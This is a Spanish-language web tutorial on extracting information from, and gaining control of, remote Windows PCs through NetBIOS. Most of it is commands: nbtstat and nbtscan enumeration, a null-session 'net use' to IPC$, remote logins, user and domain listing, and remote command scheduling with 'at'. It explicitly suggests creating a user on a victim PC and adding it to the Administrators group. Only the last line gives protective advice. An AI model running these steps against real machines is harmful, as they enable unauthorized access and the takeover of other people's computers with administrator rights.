NetBios

NetBIOS
En esta web se mostrarán diferentes manera de sacar todos los datos posibles a un PC remoto mediante NetBIOS
Lo primero de todo es comprobar que el equipo al que queremos conectarnos tiene el puerto NetBIOS abierto, el puerto es el 139; se puede hacer mediante la concola de MSDOS con ete comando: telnet DIRECCIONIP 139 y si se conecta lo tendrá abierto y sino pues a buscar otro PC.
Lo Segundo más importante es tener la tabla NetBios, que nos indicará que servicios tiene en ejecución el equipo remoto que comrobaremos con los resultados obtenidos con posteriores comandos
Nombre
Sufijo
Tipo
Servicio
00
U
Workstation Service
01
U
Messenger Service
<\_MSBROWSE_>
01
G
Master Browser
03
U
Messenger Service
06
U
RAS Server Service
1F
U
NetDDE Service
20
U
File Server Service
21
U
RAS Client Service
22
U
Exchange Interchange
23
U
Exchange Store
24
U
Exchange Directory
30
U
Modem Sharing Server Service
31
U
Modem Sharing Client Service
43
U
SMS Client Remote Control
44
U
SMS Admin Remote Control Tool
45
U
SMS Client Remote Chat
46
U
SMS Client Remote Transfer
4C
U
DEC Pathworks TCPIP Service
52
U
DEC Pathworks TCPIP Service
87
U
Exchange MTA
6A
U
Exchange IMC
BE
U
Network Monitor Agent
BF
U
Network Monitor Apps
03
U
Messenger Service
00
G
Domain Name
1B
U
Domain Master Browser
1C
G
Domain Controllers
1D
U
Master Browser
1E
G
Browser Service Elections
1C
G
Internet Information Server
00
U
Internet Information Server
Con este comando de MSDOS podremos saber que servicios corre la maquina remota: nbtstat -A DIRECCIONIP o nbtstat -a NOMBREPC. Aparte de esto también nos dará la direccion MAC por si nos interesase.



NetBIOS

Como podremos ver en la imagen hacemos un nbtstat a una IP o nombrePC y nos da esos resultados, que los comparamos con la tabla NetBIOS y sacaremos datos jugosos como su usuario, al dominio que pertenece... y si fuese un Controlador de Dominio veriamos los servicios que corre.
Para establecer lo que se llama sesión nula, tenemos que ejecutar este comando: net use \\DIRECCIONIP\IPC$ ""/u:"" . Lo que realmente hace este comando es autenticarse en el PC remoto con el usuario anonimo.
Para autenticarnos en un equipo remoto con un usuario en concreto: net use \\DIRECCIONIP /u:USUARIO CONTRASEÑA o net use \\DIRECCIONIP\C$ /u:USUARIO CONTRASEÑA o net use \\DIRECCIONIP\RECURSO /u:USUARIO CONTRASEÑA... Una vez autenticados en el host remoto para ver el contenido de la carpeta se puede hacer net view \\DIRECCIONIP y veremos el contenido via MSDOS, pero tambien puedes hacer, INICIO > EJECUTAR y pones lo que quieras: \\DIRECCIONIP o \\DIRECCIONIP\RECURSO y te mostrará con la ventana del explorador de Windows el contenido.
Ver la hora remota: net time \\DIRECCIONIP
Ver dominios disponibles: net view /domain
Ver equipos de un dominio concreto: net view /domain:BUJARRA
Ver los usuarios de un equipo: net user
Ver los detalles de un usuario: net user nombreusuario
Crear un usuario: net user nombreusuario contraseña /ADD (Ideal para crear un usuario en un PC remoto con el comando AT)
Borrar un usuario: net user nombreusuario /DELETE
Ver los grupos de un PC: net group
Meter a un usuario en un grupo: net group nombregrupo nombreusuario /ADD (Ideal para meter en grupo Administradores al usuario que hemos creado remotamente en un PC)
Sacar a un usuario de un grupo: net group nombregrupo nombreusuario /
DELETE
Comando AT, para ejecutar cosas en remoto. Con el comando at \\DIRECCIONIP veremos las tareas programadas que tiene su equipo y con el comando at \\DIRECCIONIP 21:30 /INTERACTIVE "comando de msdos a ejecutar en el PC remoto". En el comando anterior el valor 21:30 es la hora a la que le he puesto yo que se ejecute el comando de MSDOS que va entre comillas, así que se le puede poner cualquier hora, pero primero mira mejor que hora tiene!
La herramienta del Kit de Recursos de MS Windows nltest.rar muestra los controladores de dominio de un dominio en concreto, ejemplo:
C:\>nltest /dclist:bujarra.com
List pof DCS in Domain bujarra.com
    \\bujarra01
Interesante sería el programa Nbtscan que lo que hace es un 'nbtstat' de toda una red a una velocidad impresionante.Ejemplo:
C:\>nbtscan 192.168.0.0/24
   &nbspDoing NBT name scan for addresses from 192.168.0.0/24
   &nbspIP address        &nbspNetBIOS Server    &nbspServer     &nbspUser           &nbspMAC address
   &nbsp-----------------------------------------------------------------------------
   &nbsp192.168.0.0     &nbspSendto failed: Cannot assign requested address
   &nbsp192.168.0.1      &nbspBUJARRA01                &nbsp00-e0-7d-78-11-e6
   &nbsp192.168.0.13    &nbspMARIA                    &nbspMARIA         &nbsp00-e0-7d-76-5a-2b
   &nbsp192.168.0.55    &nbspVICETOPC               &nbspVICETO        00-00-f8-30-fa-23
   &nbsp192.168.0.100  &nbspRecvfrom failed: Connection reset by peer
Para protegernos de este tipo de ataques debemos o cerrar el puerto 139 en el router, o habilitaremos el firewall en XP o quitaremos el servicio de compartir carpetas e impresoras para redes microsoft (en cualquier S.O. de Microsoft).


http://www.bujarra.com

0 comentarios: